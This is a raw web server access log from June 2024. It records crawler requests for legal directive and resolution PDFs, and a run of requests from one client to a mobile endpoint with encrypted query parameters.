66.249.66.12 - - [29/Jun/2024:14:37:30 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2002%20del%2017%20de%20Enero%20de%202017.pdf HTTP/1.1" 200 3521427
186.102.67.249 - - [29/Jun/2024:14:37:30 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+1UVvWaLtASyca1aaMfE1aqJzLIjNUYm/R++FIva1a53SY9OYeyRtcTN3kcPx36KFj6KKAiqgOI9XkVyP15V/M5RMkdn4RgSfpEFHprvn+DRsourTIF+GBuNSaZV67fHV4Vzn8HvtUm6ouL2K6RhCeeiqVapapuD0=&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:30 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/2OTJC1xO70umyGET3hegaH5WFAqZRG/AieMr+f5S9KbWre89XYbxj0+2rOH654ILhP/dbbNR6nplL3NN2Usf1xbJCcEOC4hG6ryW3IuA2fesTSzGnst62W+b4Fqg54V8TQPm6u/EGlkMykMnPxLX114VJQDsXvtyLcjSF8tDvQ7Xy7G5/9nCa40HvFAfUx/X3RKJ2FH/dxg==&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:30 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/uUUvwCoO8eB3lczAUAIP1P5V/VPCsZ92EFxFbwr7v/YQZP830LBZWioU8nf//uDKe4HawspmQ0XVrpcmfKpi8/UnmY1/hb4i+Oen3fAgC7orXKzA4rBHUv6QWHw08FlXr66K6DL73C94iprT1Z+xOAe636G3n5H64CA9X2dExm+eLIrPpXwQLb6lK7HMnnPp9wwp92uvRbQ==&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:31 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Jt/RO90PnWmolOu6j9OaaN5JYtr/qqEEjxf2Vmiutnh4/MxH9hxfQR/e3n55ihYXmQCQJVKccyzhy1PiyQBivNyDQl5eIcoKljxHY9b9tey/8HQnj9Nk0ijKyKcaq7nvnR0v5dcVShiTzqtbmoKMi028MX6wIb8XiHhOETXffv5kVAgjchiSx&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:31 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18lpmQZNd1H8WBaq2OMGBpa32VJyhWW23ikt8ap3OTe3dmEL7kZMtQl2Vl+nGSnr3fGyfnfHn1tUS4SNwjxUm0xHYP+VCJIU9uttzkjjmQJ1TBS9aqPj8gXg0Dj8FsPLK5vYz+whuRc+VkNlb3zv0yN9KHUeguwaV8gwtfpvueU9RXVo+E/fpu/1rLuoFT7eyy1xV3Yg+USKg==&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:31 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/bsLBHR5b0BCEZOx1bpUAzmGRtkh/KLeI1Px5tjY+5XGJ8wmkBUubJcDtUH0DyaHZ3+j6Q6l2RrIudRVr250vDHvHMIUXYgFaI8aQAjr0MdXPGJKy0R5zAL4xSdkemmUB0WACDgHc4lxZccMcY8iryVZkSnfDfl8JKbDKKepyBT4yO7PxaYivd&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:31 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19bvQzgSdgK0grMG3+JEhgvIhGw/p9FpomKa/bZiGKpMyjG6UFc54yJeYz5XwVur15QBF2SpkBeuPlJP6gEPQtHdqWJ1Q7Md3k5n7fLB0xVwPUOI3+hkL8AOmCq1XkVGgS+JDeeEZre6stlTQDEoDpQKsBZ9eTqKF0vgb50p4ZLdreh17dcZnPKmg7dsd/CuS6bDcM/V1DafA==&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:31 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/+bWXwMjSV/JETS8mcKYzZKQTNcOpkVlGVeysONWHIY2czDL+WaxFcHe2GlFBSVr3rn/GsXGJkI28g9OX8gKvI2FQjAeE8c2I1pVZ99z0JbF0OCXkhxx8p5wq9KDr471fFV2qhWGBTgFj/RbX58jnBsnFc3XrIBR1qhfXE+k+2MF8wMysGukPU&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:32 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX190k/m6yYct62XqZCsbpvm3c5serPhOIlSfdJYRKL+9emvAm5C4mp261gfuYy4hSHnxt21nlFzskAB4zatLb7y+wqRXiYNXXmF/zuSDWYjC28xAJkGdSDGASGPt2sBuv60P1dK9CvIubwq/O2BshRDP3y2mWg/mVX0qKwKAbSz9zVbRLR++aaGeobKhnlOP4J9Pi8fAM6OoWw==&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:32 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/g3MbUtffdOZxjV/NuEKZjHbpO88w6uOAUoNZtohCHjw7YD0FAtDNk/c2TjnS0FofB6UZ9R6VQKlljOdcGIiXUYnkKSv4zXPc86amdf+w8Ny1MXm0mLXEi557jx2d5RXnsc3bncz83NSdqyaCv95rYqgjAvD7ReBge2zlQbJBW4NFY+ARLgZWS&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:32 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+DC420o72mLJAXtb7/lq2EFcNMNE1krYhd+SOL//TnYLhKUyd+BNjknAvysWzISLikJoAU5zq6Q7R/oX6x4Tzio563ouQwHYVFPE3gXLYQ8gmJNLoh0DsHGFAnFezlfP6v09noyfaXJtjtK5yFtepOaZWZ+InPhKHWCnshmIYtahBCpD/j4SM+pjx1bons4nczIQVS1CmllQ==&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:32 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19sxcdgAOD9wUQ/lxrzgmKyZ7vH8y1DUOqFu7bIb8Z1DFTITq7VKzdxPiTh2GCPNqR+2X8XI07J215Aan5alQJWhagptf4irV2QZo5jSr4NLW/Sa+LAKGEID+f3GzpTJItC+I4GEBTlhJrGN7vAw1aFMU2EH/bJot3WKbuWZCH5IguAYVFV/8Qg&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:32 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/XcRApDAQYrepa/ixVNPqIp7hhA1NKPEFEkT9oHlClCi9TkO5uPkkcY5ertxmCG708KSBicTwzNVOu9gVamo5FnRAKNH5smtQ258/6tTu74ssWGa8znCQTv/N5ALfWByYrTtiBAk1C+cqTS2v/DFTD3UUoMfQ2BXpPDlUyaSTmQM/iSgy2pcERN42mAE9Lnkqemov0aMiu2g==&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
186.102.67.249 - - [29/Jun/2024:14:37:32 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+RnVWAPS3/LcLQfFHM95RxJwuTZGdrE/3zRUdVMzVf7KMdXPAfE9YtUjd9jyDCbdQiKakbbr7OlkB1ISLZYS6/jfKNzGmK1wjX6Ej81HcylFgEyU8kjlVvUtxhh8Xg9Q7V2AXjtNKP0BpyPVo6bO/mXNX1bvqMQ/fY0TQAJzjq0AnJekQRF/cD&u=U2FsdGVkX18CbaaasD5wDSunOMLd/LTxAE7Slpa8a19fxyOYGs+/mqBaTrvsmt9l&y=U2FsdGVkX1/0NSy5R34okBwltIHuhQtjyINWEbClz1cQyF6V8hcR6m3sLKw2hbqW HTTP/1.1" 200 26
66.249.66.12 - - [29/Jun/2024:14:37:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2907.pdf HTTP/1.1" 200 359981
66.249.66.13 - - [29/Jun/2024:14:37:35 -0500] "GET /BLA/resoluciones/AUTOS%202020/0004.pdf HTTP/1.1" 304 -
